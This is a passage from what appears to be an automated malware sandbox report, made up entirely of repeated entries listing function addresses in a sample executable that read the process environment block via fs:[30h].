                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AA470 mov eax, dword ptr fs:[00000030h]5_2_015AA470
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163A456 mov eax, dword ptr fs:[00000030h]5_2_0163A456
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B8402 mov eax, dword ptr fs:[00000030h]5_2_015B8402
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B8402 mov eax, dword ptr fs:[00000030h]5_2_015B8402
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B8402 mov eax, dword ptr fs:[00000030h]5_2_015B8402
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA430 mov eax, dword ptr fs:[00000030h]5_2_015BA430
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157C427 mov eax, dword ptr fs:[00000030h]5_2_0157C427
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E420 mov eax, dword ptr fs:[00000030h]5_2_0157E420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E420 mov eax, dword ptr fs:[00000030h]5_2_0157E420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E420 mov eax, dword ptr fs:[00000030h]5_2_0157E420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015804E5 mov ecx, dword ptr fs:[00000030h]5_2_015804E5
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160A4B0 mov eax, dword ptr fs:[00000030h]5_2_0160A4B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B44B0 mov ecx, dword ptr fs:[00000030h]5_2_015B44B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015864AB mov eax, dword ptr fs:[00000030h]5_2_015864AB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163A49A mov eax, dword ptr fs:[00000030h]5_2_0163A49A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580750 mov eax, dword ptr fs:[00000030h]5_2_01580750
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2750 mov eax, dword ptr fs:[00000030h]5_2_015C2750
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2750 mov eax, dword ptr fs:[00000030h]5_2_015C2750
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B674D mov esi, dword ptr fs:[00000030h]5_2_015B674D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B674D mov eax, dword ptr fs:[00000030h]5_2_015B674D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B674D mov eax, dword ptr fs:[00000030h]5_2_015B674D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588770 mov eax, dword ptr fs:[00000030h]5_2_01588770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01604755 mov eax, dword ptr fs:[00000030h]5_2_01604755
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160E75D mov eax, dword ptr fs:[00000030h]5_2_0160E75D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580710 mov eax, dword ptr fs:[00000030h]5_2_01580710
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B0710 mov eax, dword ptr fs:[00000030h]5_2_015B0710
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC700 mov eax, dword ptr fs:[00000030h]5_2_015BC700
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B273C mov eax, dword ptr fs:[00000030h]5_2_015B273C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B273C mov ecx, dword ptr fs:[00000030h]5_2_015B273C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B273C mov eax, dword ptr fs:[00000030h]5_2_015B273C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FC730 mov eax, dword ptr fs:[00000030h]5_2_015FC730
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC720 mov eax, dword ptr fs:[00000030h]5_2_015BC720
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC720 mov eax, dword ptr fs:[00000030h]5_2_015BC720
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160E7E1 mov eax, dword ptr fs:[00000030h]5_2_0160E7E1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158C7C0 mov eax, dword ptr fs:[00000030h]5_2_0158C7C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015847FB mov eax, dword ptr fs:[00000030h]5_2_015847FB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015847FB mov eax, dword ptr fs:[00000030h]5_2_015847FB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016007C3 mov eax, dword ptr fs:[00000030h]5_2_016007C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A27ED mov eax, dword ptr fs:[00000030h]5_2_015A27ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A27ED mov eax, dword ptr fs:[00000030h]5_2_015A27ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A27ED mov eax, dword ptr fs:[00000030h]5_2_015A27ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016347A0 mov eax, dword ptr fs:[00000030h]5_2_016347A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162678E mov eax, dword ptr fs:[00000030h]5_2_0162678E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015807AF mov eax, dword ptr fs:[00000030h]5_2_015807AF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164866E mov eax, dword ptr fs:[00000030h]5_2_0164866E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164866E mov eax, dword ptr fs:[00000030h]5_2_0164866E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159C640 mov eax, dword ptr fs:[00000030h]5_2_0159C640
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B2674 mov eax, dword ptr fs:[00000030h]5_2_015B2674
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA660 mov eax, dword ptr fs:[00000030h]5_2_015BA660
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA660 mov eax, dword ptr fs:[00000030h]5_2_015BA660
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2619 mov eax, dword ptr fs:[00000030h]5_2_015C2619
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE609 mov eax, dword ptr fs:[00000030h]5_2_015FE609
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158262C mov eax, dword ptr fs:[00000030h]5_2_0158262C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B6620 mov eax, dword ptr fs:[00000030h]5_2_015B6620
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B8620 mov eax, dword ptr fs:[00000030h]5_2_015B8620
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E627 mov eax, dword ptr fs:[00000030h]5_2_0159E627
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016006F1 mov eax, dword ptr fs:[00000030h]5_2_016006F1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016006F1 mov eax, dword ptr fs:[00000030h]5_2_016006F1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA6C7 mov ebx, dword ptr fs:[00000030h]5_2_015BA6C7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA6C7 mov eax, dword ptr fs:[00000030h]5_2_015BA6C7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE6F2 mov eax, dword ptr fs:[00000030h]5_2_015FE6F2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE6F2 mov eax, dword ptr fs:[00000030h]5_2_015FE6F2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE6F2 mov eax, dword ptr fs:[00000030h]5_2_015FE6F2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE6F2 mov eax, dword ptr fs:[00000030h]5_2_015FE6F2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584690 mov eax, dword ptr fs:[00000030h]5_2_01584690
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584690 mov eax, dword ptr fs:[00000030h]5_2_01584690
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B66B0 mov eax, dword ptr fs:[00000030h]5_2_015B66B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC6A6 mov eax, dword ptr fs:[00000030h]5_2_015BC6A6
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01624978 mov eax, dword ptr fs:[00000030h]5_2_01624978
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01624978 mov eax, dword ptr fs:[00000030h]5_2_01624978
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160C97C mov eax, dword ptr fs:[00000030h]5_2_0160C97C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01600946 mov eax, dword ptr fs:[00000030h]5_2_01600946
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C096E mov eax, dword ptr fs:[00000030h]5_2_015C096E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C096E mov edx, dword ptr fs:[00000030h]5_2_015C096E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C096E mov eax, dword ptr fs:[00000030h]5_2_015C096E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A6962 mov eax, dword ptr fs:[00000030h]5_2_015A6962
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A6962 mov eax, dword ptr fs:[00000030h]5_2_015A6962
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A6962 mov eax, dword ptr fs:[00000030h]5_2_015A6962
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160892A mov eax, dword ptr fs:[00000030h]5_2_0160892A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0161892B mov eax, dword ptr fs:[00000030h]5_2_0161892B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01578918 mov eax, dword ptr fs:[00000030h]5_2_01578918
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01578918 mov eax, dword ptr fs:[00000030h]5_2_01578918
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE908 mov eax, dword ptr fs:[00000030h]5_2_015FE908
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE908 mov eax, dword ptr fs:[00000030h]5_2_015FE908
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160C912 mov eax, dword ptr fs:[00000030h]5_2_0160C912
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160E9E0 mov eax, dword ptr fs:[00000030h]5_2_0160E9E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A9D0 mov eax, dword ptr fs:[00000030h]5_2_0158A9D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A9D0 mov eax, dword ptr fs:[00000030h]5_2_0158A9D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A9D0 mov eax, dword ptr fs:[00000030h]5_2_0158A9D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A9D0 mov eax, dword ptr fs:[00000030h]5_2_0158A9D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A9D0 mov eax, dword ptr fs:[00000030h]5_2_0158A9D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A9D0 mov eax, dword ptr fs:[00000030h]5_2_0158A9D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B49D0 mov eax, dword ptr fs:[00000030h]5_2_015B49D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016169C0 mov eax, dword ptr fs:[00000030h]5_2_016169C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B29F9 mov eax, dword ptr fs:[00000030h]5_2_015B29F9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B29F9 mov eax, dword ptr fs:[00000030h]5_2_015B29F9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164A9D3 mov eax, dword ptr fs:[00000030h]5_2_0164A9D3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016089B3 mov esi, dword ptr fs:[00000030h]5_2_016089B3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016089B3 mov eax, dword ptr fs:[00000030h]5_2_016089B3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016089B3 mov eax, dword ptr fs:[00000030h]5_2_016089B3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015809AD mov eax, dword ptr fs:[00000030h]5_2_015809AD
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015809AD mov eax, dword ptr fs:[00000030h]5_2_015809AD
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015929A0 mov eax, dword ptr fs:[00000030h]5_2_015929A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584859 mov eax, dword ptr fs:[00000030h]5_2_01584859
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584859 mov eax, dword ptr fs:[00000030h]5_2_01584859
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B0854 mov eax, dword ptr fs:[00000030h]5_2_015B0854
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01616870 mov eax, dword ptr fs:[00000030h]5_2_01616870
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01616870 mov eax, dword ptr fs:[00000030h]5_2_01616870
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160E872 mov eax, dword ptr fs:[00000030h]5_2_0160E872
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160E872 mov eax, dword ptr fs:[00000030h]5_2_0160E872
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01592840 mov ecx, dword ptr fs:[00000030h]5_2_01592840
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162483A mov eax, dword ptr fs:[00000030h]5_2_0162483A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162483A mov eax, dword ptr fs:[00000030h]5_2_0162483A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA830 mov eax, dword ptr fs:[00000030h]5_2_015BA830
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A2835 mov eax, dword ptr fs:[00000030h]5_2_015A2835
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A2835 mov eax, dword ptr fs:[00000030h]5_2_015A2835
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A2835 mov eax, dword ptr fs:[00000030h]5_2_015A2835
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A2835 mov ecx, dword ptr fs:[00000030h]5_2_015A2835
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A2835 mov eax, dword ptr fs:[00000030h]5_2_015A2835
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A2835 mov eax, dword ptr fs:[00000030h]5_2_015A2835
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160C810 mov eax, dword ptr fs:[00000030h]5_2_0160C810
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164A8E4 mov eax, dword ptr fs:[00000030h]5_2_0164A8E4
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE8C0 mov eax, dword ptr fs:[00000030h]5_2_015AE8C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC8F9 mov eax, dword ptr fs:[00000030h]5_2_015BC8F9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC8F9 mov eax, dword ptr fs:[00000030h]5_2_015BC8F9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016508C0 mov eax, dword ptr fs:[00000030h]5_2_016508C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580887 mov eax, dword ptr fs:[00000030h]5_2_01580887
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160C89D mov eax, dword ptr fs:[00000030h]5_2_0160C89D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01628B42 mov eax, dword ptr fs:[00000030h]5_2_01628B42
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01616B40 mov eax, dword ptr fs:[00000030h]5_2_01616B40
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01616B40 mov eax, dword ptr fs:[00000030h]5_2_01616B40
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164AB40 mov eax, dword ptr fs:[00000030h]5_2_0164AB40
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01634B4B mov eax, dword ptr fs:[00000030h]5_2_01634B4B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01634B4B mov eax, dword ptr fs:[00000030h]5_2_01634B4B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157CB7E mov eax, dword ptr fs:[00000030h]5_2_0157CB7E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162EB50 mov eax, dword ptr fs:[00000030h]5_2_0162EB50
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FEB1D mov eax, dword ptr fs:[00000030h]5_2_015FEB1D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01648B28 mov eax, dword ptr fs:[00000030h]5_2_01648B28
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01648B28 mov eax, dword ptr fs:[00000030h]5_2_01648B28
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AEB20 mov eax, dword ptr fs:[00000030h]5_2_015AEB20
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AEB20 mov eax, dword ptr fs:[00000030h]5_2_015AEB20
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160CBF0 mov eax, dword ptr fs:[00000030h]5_2_0160CBF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A0BCB mov eax, dword ptr fs:[00000030h]5_2_015A0BCB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A0BCB mov eax, dword ptr fs:[00000030h]5_2_015A0BCB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A0BCB mov eax, dword ptr fs:[00000030h]5_2_015A0BCB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580BCD mov eax, dword ptr fs:[00000030h]5_2_01580BCD
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580BCD mov eax, dword ptr fs:[00000030h]5_2_01580BCD
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580BCD mov eax, dword ptr fs:[00000030h]5_2_01580BCD
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AEBFC mov eax, dword ptr fs:[00000030h]5_2_015AEBFC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588BF0 mov eax, dword ptr fs:[00000030h]5_2_01588BF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588BF0 mov eax, dword ptr fs:[00000030h]5_2_01588BF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588BF0 mov eax, dword ptr fs:[00000030h]5_2_01588BF0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162EBD0 mov eax, dword ptr fs:[00000030h]5_2_0162EBD0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01634BB0 mov eax, dword ptr fs:[00000030h]5_2_01634BB0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01634BB0 mov eax, dword ptr fs:[00000030h]5_2_01634BB0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590BBE mov eax, dword ptr fs:[00000030h]5_2_01590BBE
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590BBE mov eax, dword ptr fs:[00000030h]5_2_01590BBE
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590A5B mov eax, dword ptr fs:[00000030h]5_2_01590A5B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590A5B mov eax, dword ptr fs:[00000030h]5_2_01590A5B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162EA60 mov eax, dword ptr fs:[00000030h]5_2_0162EA60
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586A50 mov eax, dword ptr fs:[00000030h]5_2_01586A50
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586A50 mov eax, dword ptr fs:[00000030h]5_2_01586A50
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586A50 mov eax, dword ptr fs:[00000030h]5_2_01586A50
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586A50 mov eax, dword ptr fs:[00000030h]5_2_01586A50
